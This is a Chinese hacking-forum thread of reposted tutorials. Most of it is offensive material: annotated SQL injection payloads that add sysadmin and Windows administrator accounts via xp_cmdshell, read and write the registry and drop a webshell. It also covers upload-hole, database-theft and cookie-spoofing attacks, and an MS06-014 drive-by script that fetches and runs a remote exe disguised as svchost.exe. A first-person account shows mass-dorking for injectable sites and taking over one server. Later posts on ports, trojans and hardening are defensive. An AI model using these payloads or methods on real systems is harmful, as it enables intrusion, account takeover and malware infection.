[讨论]黑客技术讨论专帖

嬡哭鬼'

骇客学堂：带注释手动注入脚本命令整理

整理了下手动注入脚本命令[带注释]
　　1.判断是否有注入;and 1=1 ;and 1=2

　　2.初步判断是否是mssql ;and user>0

　　3.注入参数是字符’and [查询条件] and ’’=’

　　4.搜索时没过滤参数的’and [查询条件] and ’%25’=’

　　5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

　　6.猜数据库 ;and (select Count(*) from [数据库名])>0

　　7.猜字段 ;and (select Count(字段名) from 数据库名)>0

　　8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0

　　9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

　　(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

　　10.测试权限结构（mssql）

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--

;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--

;and 1=(select IS_MEMBER(’db_owner’));--

　　11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin username;--

;exec master.dbo.xp_cmdshell ’net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--

;exec master.dbo.xp_cmdshell ’net user username password /add’;--

;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--

　　12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ’c:\’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(’上步得到的paths’))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs ’c:\’;-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:\’;-- 获得所有子目录的目录树构

;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:\web\index.asp’;-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread

’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’,’reg_sz’,’hello’ 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestValueName’ 删除某个值
xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values (’’);

backup database model to disk=’c:\l.asp’;

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

creat

嬡哭鬼'

骇客学堂：五招常用网站入侵手法介绍

首先介绍下什么样的站点可以入侵：必须是动态的网站 比如 asp php jsp 这种形式的站点 后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0） 

　　入侵介绍： 1。上传漏洞 2。暴库 3。注入 4。旁注 5。COOKIE诈骗 

　　1：上传漏洞，这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。 

　　怎样利用：在网站的地址栏中网址后加上/upfile.asp如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传漏洞了找个可以上传的工具直接可以得到WEBSHELL 
　　工具介绍：上传工具 老兵的上传工具 DOMAIN3.5 这两个软件都可以达到上传的目的 用NC也可以提交 

　　WEBSHELL是什么：WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，（这个看管理员的设置了）一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道（比如老兵的站长助手就是WEB木马 海阳2006也是 WEB木马）我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。 

　　2。暴库：这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。 

　　暴库方法：比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 我门就可以把com/dispbbs中间的/换成\ 如果有漏洞直接得到数据库的绝对路径 用寻雷什么的下载下来就可以了 还有种方法就是利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径也可以得到数据库的路径（注意：这里的/也要换成\） 

　　为什么换成\：因为在ASCII码里/等于\，有时碰到数据库名字为/#abc.mdb的为什么下不了？ 这里需要把#号换成#就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的？我该怎么办？这里可以在下载时把。ASP换成。MDB 这样就可以下载了如果还下载不了可能作了防下载。 

　　3。注入漏洞：这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。
 
　　怎样利用：我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多（NBSI NDSI 啊D DOMAIN等）都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。 

　　4。旁注：我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻， 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站) 
　　工具介绍：还是名小子的DOMIAN3.5不错的东西 ，可以检测注入 可以旁注 还可以上传！

　　5.COOKIE诈骗：许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。 
　　怎样诈骗呢？如果我们现在已经知道了XX站管理员的站号和MD5密码了 但是破解 不出来密码 （MD5是加密后的一个16位的密码）我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。 
　　今天的介绍就到这里了 比较基础，都是概念性的东西，所有的都是我的个人理解，如有不正确的地方希望大家指出（个人认为就是 为什么换成\ 这里有点问题）。

嬡哭鬼'

黑客常用入侵方法、入侵工具

首先介绍下什么样的站点可以入侵：必须是动态的网站，比如asp、php、jsp 这种形式的站点。后缀为.htm的站点劝大家还是不要入侵了吧（入侵几率几乎为0）。

　　入侵介绍: 1、上传漏洞；2、暴库；3、注入；4、旁注；5、COOKIE诈骗。

1、上传漏洞

　　这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗，利用上传漏洞可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传漏洞也是常见的漏洞。

　　怎样利用：在网站的地址栏中网址后加上/upfile.asp如果显示“上传格式不正确[重新上传]”这样的字样就是有上传漏洞了，找个可以上传的工具直接可以得到WEBSHELL。

　　工具介绍：上传工具，老兵的上传工具、DOMAIN3.5，这两个软件都可以达到上传的目的，用NC也可以提交。

　　WEBSHELL是什么：WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，(这个看管理员的设置了)一般修改别人主页大多都需要这个权限，接触过WEB木马的朋友可能知道（比如老兵的站长助手就是WEB木马，海阳2006也是WEB木马）。我们上传漏洞最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。

2、暴库

　　这个漏洞现在很少见了，但是还有许多站点有这个漏洞可以利用，暴库就是提交字符得到数据库文件，得到了数据库文件我们就直接有了站点的前台或者后台的权限了。

　　暴库方法：比如一个站的地址为 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161，我门就可以把com/dispbbs中间的/换成%5c，如果有漏洞直接得到数据库的绝对路径，用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径http://www.xxx.com/后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径（注意：这里的/也要换成%5c）。

　　为什么换成%5c：因为在ASCII码里/等于%5c，有时碰到数据库名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了，为什么我暴出的数据库文件是以。ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。

3、注入漏洞

　　这个漏洞是现在应用最广泛，杀伤力也很大的漏洞，可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。

　　怎样利用：我先介绍下怎样找漏洞比如这个网址 http://www.xxx.com/dispbbs.asp?boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞，知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多（NBSI、NDSI、啊D、DOMAIN等），都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。

4、旁注

　　我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻，比如你和我一个楼，我家很安全，而你家呢，却漏洞百出，现在有个贼想入侵我家，他对我家做了监视（也就是扫描），发现没有什么可以利用的东西，那么这个贼发现你家和我家一个楼，你家很容易就进去了，他可以先进入你家，然后通过你家得到整个楼的钥匙（系统权限），这样就自然得到我的钥匙了，就可以进入我的家（网站）。

　　工具介绍：还是名小子的DOMIAN3.5不错的东西，可以检测注入，可以旁注，还可以上传!

5、COOKIE诈骗

　　许多人不知道什么是COOKIE，COOKIE是你上网时由网站所为你发送的值记录了你的一些资料，比如IP，姓名什么的。

　　怎样诈骗呢？如果我们现在已经知道了XX站管理员的站号和MD5密码了，但是破解不出来密码（MD5是加密后的一个16位的密码）。我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。

嬡哭鬼'

黑客技术之知道对方IP入侵别人的电脑

黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。 现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法:

1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。

2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。

3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明。

4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件：XX.XX.XX.XX 电脑名。

5.开DOS窗口键入 NBTSTAT -R。

6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。

以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

嬡哭鬼'

在XSL中引用的两种方法

在XSL中引用自身数据的两种方法，如果你使用Msxml解析器，你可以用方法二：
  
  
  方法一
  
  <?xml version="1.0" encoding="UTF-8"?>
 
  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:mxh="http://xml.sz.luohuedu.net/">
   <xsl:template match="/">
   <mxh:Root>
   <Line Val="1"/>
   <Line Val="2"/>
   <Line Val="3"/>
   </mxh:Root>
   <xsl:for-each select="document(’’)/xsl:stylesheet/xsl:template/mxh:Root/Line">
   <xsl:value-of select="@Val"/>
   </xsl:for-each>
   </xsl:template>
  </xsl:stylesheet>
  方法二
  
  <?xml version="1.0" encoding="UTF-8"?>
  <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:msxsl="urn:schemas-microsoft-com:xslt">
   <xsl:template match="/">
   <xsl:variable name="Array">
   <Root>
   <Line Val="1"/>
   <Line Val="2"/>
   <Line Val="3"/>
   </Root>
   </xsl:variable>
   <xsl:for-each select="msxsl:node-set($Array)/Root/Line">
   <xsl:value-of select="@Val"/>
   </xsl:for-each>
   </xsl:template>
  </xsl:stylesheet>

嬡哭鬼'

MS06014网马脚本解释

---------------------采用讯驰移动双核技术的分割线-------------------------------------------
　　Set df = document.createElement("object")   '创建项目
　　df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"   '对项目进行36位全球唯一码编号
　　Set x = df.CreateObject("Microsoft.XMLHTTP,"") '创建一个XMLHTTP项目(用来传输数据)
　　set SS = df.createobject("ADODB.Stream","")   '创建一个ADOBD数据流格式(数据媒介)
　　SS.type = 1 '类型.1好像是2进制.具体忘了
　　x.Open Get, "http://fxfqiao.com/laopo/1.exe", False '打开远程文件,这个就是木马文件了
　　x.Send '发送
　　set F = df.createobject("Scripting.FileSystemObject","") '创建一个文件项目(用来把数据流还原成文件)
　　set tmp = F.GetSpecialFolder(2) '这句好像是获得文件夹
　　SS.open ''
　　fname1= F.BuildPath(tmp,"svchost.exe") '注入到svchost.exe
　　SS.write x.responseBody '把远程文件写入数据流中
　　SS.savetofile fname1,2 '把数据流存为文件.并且是直接写到svchost.exe的Hook好像,到这里.你的机器已经中毒
　　set Q = df.createobject(Shell.Application,"") '创建一个Shell
　　Q.ShellExecute fname1,"","","open",0 '到这里.你的病毒开始发挥作用
　　------------------------------------------采用讯驰移动双核技术的分割线-------------------------------------------------------

嬡哭鬼'

获取注入点的方法

获取注入点的方法不外乎两种:手工寻找和利用注入工具寻找。对于前者，多数是用搜索引擎来找特定的网址(形如xxx.asp?xxid=)，对于后者，则是针对具体某个站点用注入工具扫描注入点。不过，你有没有考虑过把这两种方法结合起来使用呢?我就倾向于二者的组合使用，方法如下:
　　在阿D注入工具中的“扫描注入点”功能模块的地址栏里输入并转到google的网址，选择“高级搜索”，在搜索结果栏中选择“100项结果”，语言选择“简体中文”，关键字填:xxx inurl:asp或是inurl:XX.asp?id=、inurl:xxx.asp?xxid等，这些都是我们常见的可能存在注入点的网址形式，我输入的是ert inurl:asp(有人说这个关键字容易找到sa权限，不知是真是假，但我确实找到了不少)。点击搜索后，在注入点一栏中马上就会显示出N多的有注入点的网址。

　　在第一页中就显示找到了20几个(20%)，从头开始试，检测一下，是不是sa权限，若不是可先跳过。因为本文讲的是sa权限，所以在这里我们只找有sa权限注入点的网站，以省去菜鸟们在注入时因一些权限问题而导致入侵卡住的情况。也许有人要问了，有那么多sa权限注入点的网站吗?根据我的个人经验，只要你的关键字设的好，每100项中就有20几个(约20%)有注入漏洞的网站，在这些网站中又有5个左右(约5%)是有sa权限的。试想想，只要我们的关键字设的好，google可以搜索到的结果何止是100项，一般的搜索结果都在1万项以上，这样算来，我们的目标就有成百上千呀(小菜高呼:哇!发财了!)，就怕你没有那么多的精力去注入全部的网站，呵呵!我马上就找到了一个(运气好呀，可以去买票了，说不定是头奖呢?呵呵，又一个百万富翁!什么?现在百万富翁不算啥?要不，你给我一百万?!)。将这个网址复制到明小子的domain3.2中进行检测，也确实是sa权限，跟阿D注入工具显示的一样。

　　用domain的命令行功能查看一下开放的端口，发现开放了21、23、80、1433、3389等端口，看来我今天运气的确不错呀!加个账号admin$，但由于管理员已经远程登录3389。

　　看来我暂时不要登录的为好。再看看有没有其它可以利用的东西，用阿D注入工具的目录浏览功能看了一下(个人感觉这方面阿D注入工具要比domain好!明小子怒目圆睁，大叫:你收了阿D多少好处!)忽然眼睛一亮，发现D盘有一个wwwroot目录，并且里面有一个目录和网站名一样。

　　呵呵，好东西呀，向里面写入个asp木马试试，浏览文件也好方便一些。但接下来让我郁闷的是明明提示已经上传成功。

　　但在浏览器中输入它的地址却提示没有该文件，而且到了后来，domain的命令行功能反馈回来的信息也变得非常凌乱，不知道是怎么回事。于是想换个cmdshell，又想起它开了23端口，用telnet连接了一下，发现有ntlm认证。呵呵，老办法，在本地新建一个admin$账号，密码和目标主机上的一样，再用这个账号运行cmd.exe，telnet到目标主机——连接成功，用query user查看了一下终端情况，发现有一个会话处于断开状态，于是我便用3389连接了一下，却提示3389已经达到了最大连接数!我晕，看来有连接数限制，干脆把这个会话结束掉，反正它也断开了，浪费资源!呵呵，输入logoff 2(它的会话ID)，然后用3389登录试试，登录成功。

　　本想入侵到这里就结束的，但看了一下这台主机的配置:P4 3.0，512M内存，我就不禁流口水了，这样的主机放过了就可惜了，是极品呀，于是就又有了下文的一些曲折!

　　用3389进来后，本想在上面安装Radmin，但发现程序菜单里已经有了，看来是管理员远程控制用的，此路显然是不通了。突然想起Radmin的密码文件是存在注册表里的，虽然是加了密的，但现在已经有了Radmin密码的暴力破解工具，把它在注册表中的密码键值读取出来保存到一个临时文件。

　　然后编辑这个文件，直接通过3389复制粘贴到本地，用破解软件跑了半天，没有结果，看来管理员设的Radmin密码也不弱智呀!

　　算了，再找别的思路吧!在上面装个rmtsvc?这也是远程控制软件中的精品呀!怎么上传呢，在本地开个FTP，然后通过3389打开一个cmd进行登录，发现半天没有反应，它上面有Serv-U，加个账号再在本地连接试试，也是没反应!毕竟是个人气还挺旺的游戏网站嘛，连接的人太多，看来是网速受影响了!没办法，前面不是有个1433端口开放了吗?呵呵，不是还知道它的网站文件所在的目录了吗?找数据库连接文件呗——地球人都知道!我找呀找呀找呀找，找到一个好朋友:connin.asp，打开看了看，密码就乖乖地躺在里面呢。

　　马上用SQLTools连接上，发现一点击上传文件后，也是就卡住了，看来网速的确是受影响了，总不能为了让网络流量小一点，就让我把目标主机强行重启吧?我可是有点怕怕呀，呵呵!怎么办呢?

　　正当无奈之际，突然看到了桌面上的IE浏览器，于是灵光一闪，真是山重水复疑无路，柳暗花明又一村，终于找到救星了!马上用它从网上下载了一个rmtsvc装上。呵呵，终于成功安装!整了半天，我咋就没想到利用IE直接上网去下载呢?

　　到这，我已经完全控制了这台主机。不过，为了保险起

嬡哭鬼'

端口·木马·安全·扫描应用知识

文章出处

嬡哭鬼'

端口·木马·安全·扫描应用知识

看到这个题目你也许有些奇怪，怎么把这几个词放在了一起，其实谈起端口和木马都是老生常谈了，但即使是常谈还有很多人的计算机被“冲击波”冲过之后又被“震荡波”狠狠地震了一下，看来很有必要再谈谈老话题，免得再被什么波温柔地扫过。其实说这些最终的目的就是为了保证计算机的上网安全。

一、 端口

一)、端口的一般含义

说到端口，这确实是个老话题，但一切都是从它开始的，不得不说。何谓端口，打个比方，你住在一座房子里，想让别人来拜访你，得在房子上开个大门，你养了个可爱的小猫，为了它的进出，专门给它修了个小门，为了到后花园，又开了个后门……所有这些为了进到这所房子里而开的门我们叫它端口，这些为了别人进来而开的端口称它为'服务端口'。

你要拜访一个叫张三的人，张三家应该开了个允许你来的门____服务端口，否则将被拒之门外。去时，首先你在家开个'门'，然后通过这个'门'径直走进张三家的大门。为了访问别人而在自己的房子开的'门'，我们称它为'客户端口'。它是随机开的而且是主动打开的，访问完就自行关闭了。它和服务端口性质是不一样的，服务端口是开了个门等着别人来访问，而客户端口是主动打开一个门去打开别人的门，这点一定要清楚。

下面我们从专业的角度再简单解释一下端口的概念。联网的计算机要能相互通信必须用同一种协议，协议就是计算机通信的语言，计算机之间必须说一种语言才能彼此通信，Internet的通用语言是TCP/TP，它是一组协议，它规定在网络的第四层运输层有两种协议TCP、UDP。端口就是这两个协议打开的，端口分为源端口和目的端口，源端口是本机打开的，目的端口是正在和本机通信的另一台计算机的端口，源端口分主动打开的客户端口和被动连接的服务端口两种。在Internet中，你访问一个网站时就是在本机开个端口去连网站服务器的一个端口，别人访问你时也是如此。也就是说计算机的通讯就像我们互相串门一样，从这个门走进哪个门。

当你装好系统后默认就开了很多'服务端口'。如何知道自己的计算机系统开了那些端口呢?这就是下面要说的:

二)、查看端口的方法

1、命令方式

下面以Windows XP为例看看新安装的系统都开了那些端口，也就是说都预留了那些门，不借助任何工具来查看端口的命令是netstat，方法如下:

a、在'开始'的'运行'处键入cmd，回车

b、在dos命令界面，键入netstat -na，Proto代表协议，有TCP和UDP两种协议。Local Address代表本机地址，该地址冒号后的数字就是开放的端口号。Foreign ress代表远程地址，如果和其它机器正在通信，显示的就是对方的地址，State代表状态，显示的

LISTENING表示处于侦听状态，就是说该端口是开放的，等待连接，但还没有被连接。就像你房子的门已经敞开了，但此时还没有人进来。以第一行为例看看它的意思。

这一行的意思是本机的135端口正在等待连接。注意:只有TCP协议的服务端口才能处于LISTENING状态。

2、用TCPView工具

为了更好的分析端口，最好用TCPView这个软件，该软件很小只有93KB，而且是个绿色软件，不用安装。

第一次显示时字体有些小，在'Options'->'Font'中将字号调大即可。TCPView显示的数据是动态的。Local Address显示的就是本机开放的哪个端口(:号后面的数字)，TCPView可以看出哪个端口是由哪个程序发起的。445、139、1025、135、5000等端口是开放的，445、139等端口都是system发起的，135等都是SVCHOST发起的。

三)、研究端口的目的:

1、知道本机开了那些端口，也就是可以进入到本机的'门'有几个，都是谁开的?

2、目前本机的端口处于什么状态，是等待连接还是已经连接，如果是已经连接那就要特别注意看连接是个正常连接还是非正常连接(木马等)?

3、目前本机是不是正在和其它计算机交换数据，是正常的程序防问到一个正常网站还是访问到一个陷阱?

当你上网时就是本机和其它机器传递数据的过程，要传递数据必须要用到端口，即使是有些非常高明的木马利用正常的端口传送数据也不是了无痕迹的，数据在开始传输、正在传输和结束传输的不同阶段都有各自的状态，要想搞明白上述3个问题，就必须清楚端口的状态变化。下面

嬡哭鬼'

七)、要点

一般用户一定要熟悉(再啰嗦几句):

1、服务端口重点要看的是LISTENING状态和ESTABLISHED状态，LISTENING是本机开了哪些端口，　　ESTABLISHED是谁在访问你的机器，从哪个地址访问的。

2、客户端口的SYN_SENT状态和ESTABLISHED状态，SYN_SENT是本机向其它计算机发出的连接请求，一般这个状态存在的时间很短，但如果本机发出了很多SYN_SENT，那可能就是中毒了。看ESTABLISHED状态是要发现本机正在和哪个机器传送数据，主要看是不是一个正常程序发起的。

二、木马

什么是木马，简单的说就是在未经你许可偷偷在你的计算机中开个后门，木马开后门主要有两种方式。

1、有服务端口的木马，这类木马都要开个服务端口的后门，成功后该后门处于LISTENING状态，它的端口号可能固定一个数，也可能变化，还有的木马可以与正常的端口合用，例如你开着正常的80端口(WEB服务)，木马也用80端口。这种木马最大的特点就是有端口处于LISTENING状态，需要远程计算机连接它。这种木马对一般用户比较好防范，将防火墙设为拒绝从外到内的连接即可。比较难防范的是反弹型木马。

2、反弹型木马，反弹型木马是从内向外的连接，它可以有效的穿透防火墙，而且即使你使用的是内网IP，他一样也能访问你的计算机。这种木马的原理是服务端主动连接客户端(黑客)地址。木马的服务端软件就像你的Internet Explorer一样，使用动态分配端口去连接客户端的某一端口，通常是常用端口，像端口80。而且会使用隐避性较强的文件名，像iexpiore.exe、explorer(IE的程序是IEXPLORE.EXE)。如果你不仔细看，你可能会以为是你的Internet Explorer。这样你的防火墙也会被骗过。如果你在TcpView中看到下面这样的连接一定要注意，很有可能是种木马了。 iexpiore.exe 192.168.1.10(本机IP):1035(你的端口) Y.Y.Y.Y(远程IP):80(远程端口)

或 Rundll32.exe 192.168.1.10(本机IP):1035(你的端口) Y.Y.Y.Y(远程IP):80(远程端口)

或 explorer.exe 192.168.1.10(本机IP):1035(你的端口) Y.Y.Y.Y(远程IP):80(远程端口)

三、安全

我们分析端口的目的就是要保证上网安全，根据以上的思路可以从以下几个方面来防范。

一)、关闭不需要的端口

对一般上网用户来说只要能访问Internet就行了，并不需要别人来访问你，也就是说没有必要开放服务端口，在WIN 98可以做到不开放任何服务端口上网，但在Win XP、Win 2000、Win 2003下不行，但可以关闭不必要的端口。

1、关闭137、138、139、445端口

这几个端口都是为共享而开的，是NetBios协议的应用，一般上网用户是不需要别人来共享你的内容的，而且也是漏洞最多的端口。关闭的方法很多，最近从网上学了一招非常好用，一次全部关闭上述端口。

开始-> 控制面板-> 系统-> 硬件-> 设备管理器-> 查看-> 显示隐藏的设备-> 非即插即用驱动程序-> Netbios over Tcpip。

禁用该设备重新启动后即可。

2、关闭123端口

有些蠕虫病毒可利用UDP 123端口，关闭的方法:停止windows time服务。

3、关闭1900端口

攻击者只要向某个拥有多台Win XP系统的网络发送一个虚假的UDP包，就可能会造成这些Win XP主机对指定的主机进行攻击(DDoS)。另外如果向该系统1900端口发送一个UDP包，令'Location'域的地址指向另一系统的chargen端口，就有可能使系统陷入一个死循环，消耗掉系统的所有资源(需要安装硬件时需手动开启)。

关闭1900端口的方法:停止SSDP Discovery Service 服务

通过上面的办法关闭了一些有漏洞的或不用的端口后是不是就没问题了呢?不是。因为有些端口是不能关掉的。像135端口，它是RPC服务打开的端口如果把这个服务停掉，那计算机就关机了，同样像Lsass打开的端口500和4500也不能关闭。冲击波病毒利用的就是135端口，对于不能关闭的端口最好的办法一是常打补丁，端口都是相应的服务打开的，但是对于一般用户很难判断这些服务到底有什么用途，也很难找到停止哪些服务就能关闭相应的端口。最好的办法就是下面我们要讲的安装防火墙。安装防火墙的作用通俗的说就像你不管住在一所结实的好房子里还是住在一所千疮百孔的破房子里，只要你在房子的四